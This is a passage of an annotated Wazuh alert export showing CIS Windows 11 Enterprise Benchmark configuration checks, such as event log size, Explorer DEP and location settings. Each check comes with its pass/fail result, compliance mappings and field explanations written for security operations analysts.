No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.8,CC7.2,CC7.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\System']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.959+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.959+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  25
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.27.4.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gpg13:  ['4.12']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr_IV:  ['35.7.d']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2579721
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26310
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'System: Specify the maximum log file size (KB)' is set to 'Enabled: 32,768 or greater'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting specifies the maximum size of the log file in kilobytes. The maximum log file size can be configured between 1 megabyte (1,024 kilobytes) and 4 terabytes (4,194,240 kilobytes) in kilobyte increments. The recommended state for this setting is: Enabled: 32,768 or greater.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: 32,768 or greater: Computer Configuration\Policies\Administrative Templates\Windows Components\Event Log Service\System\Specify the maximum log file size (KB). Note: This Group Policy path is provided by the Group Policy template EventLog.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Note #2: In older Microsoft Windows Administrative Templates, this setting was initially named Maximum Log Size (KB), but it was renamed starting with the Windows 8.0 & Server 2012 (non-R2) Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.27.4.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  10.6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  AU.6
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gpg13:  4.12
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gdpr_IV:  35.7.d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.b
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.8,CC7.2,CC7.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\System']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Data Execution Prevention for Explorer' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Data Execution Prevention for Explorer' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.975+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.975+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Data Execution Prevention for Explorer' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.31.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gpg13:  ['4.12']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr_IV:  ['35.7.d']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2583879
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26311
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off Data Execution Prevention for Explorer' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  Disabling Data Execution Prevention can allow certain legacy plug-in applications to function without terminating Explorer. The recommended state for this setting is: Disabled. Note: Some legacy plug-in applications and other software may not function with Data Execution Prevention and will require an exception to be defined for that specific plug- in/software.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Data Execution Prevention is an important security feature supported by Explorer that helps to limit the impact of certain types of malware.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\File Explorer\Turn off Data Execution Prevention for Explorer. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Explorer.admx/adml that is included with the Microsoft Windows 7 & Server 2008 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.31.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  10.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  10.6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  AU.6
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gpg13:  4.12
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gdpr_IV:  35.7.d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.b
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.8,CC7.2,CC7.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off heap termination on corruption' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off heap termination on corruption' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.990+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.990+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off heap termination on corruption' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.4']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC5.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.31.3']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2587688
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26312
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off heap termination on corruption' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  Without heap termination on corruption, legacy plug-in applications may continue to function when a File Explorer session has become corrupt. Ensuring that heap termination on corruption is active will prevent this. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Allowing an application to function after its session has become corrupt increases the risk posture to the system.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\File Explorer\Turn off heap termination on corruption. Note: This Group Policy path is provided by the Group Policy template Explorer.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.31.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  CM.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.006+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.006+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.4']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC5.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.31.4']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2590885
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26313
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to configure the amount of functionality that the shell protocol can have. When using the full functionality of this protocol, applications can open folders and launch files. The protected mode reduces the functionality of this protocol allowing applications to only open a limited set of folders. Applications are not able to open files with this protocol when it is in the protected mode. It is recommended to leave this protocol in the protected mode to increase the security of Windows. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Limiting the opening of files and folders to a limited set reduces the attack surface of the system.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\File Explorer\Turn off shell protocol protected mode. Note: This Group Policy path is provided by the Group Policy template WindowsExplorer.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.31.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  CM.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.022+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.022+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  26
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '7.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.4']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.36.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2594755
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26314
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  By default, users can add their computer to a HomeGroup on a home network. The recommended state for this setting is: Enabled. Note: The HomeGroup feature is available in all workstation releases of Windows from Windows 7 through Windows 10 Release 1709. Microsoft removed the feature completely starting with Windows 10 Release 1803. However, if your environment still contains any Windows 10 Release 1709 (or older) workstations, then this setting remains important to disable HomeGroup on those systems.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  While resources on a domain-joined computer cannot be shared with a HomeGroup, information from the domain-joined computer can be leaked to other computers in the HomeGroup.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\HomeGroup\Prevent the computer from joining a homegroup. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Sharing.admx/adml that is included with the Microsoft Windows 7 & Server 2008 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.36.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  7.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\HomeGroup']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off location' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off location' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.038+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.038+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off location' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  27
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.41.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2598554
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26315
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off location' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting turns off the location feature for the computer. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  This setting affects the location feature (e.g. GPS or other location tracking). From a security perspective, it's not a good idea to reveal your location to software in most cases, but there are legitimate uses, such as mapping software. However, they should not be used in high security environments.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Location and Sensors\Turn off location. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Sensors.admx/adml that is included with the Microsoft Windows 7 & Server 2008 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.41.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\LocationAndSensors']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Message Service Cloud Sync' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Message Service Cloud Sync' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.053+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.053+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
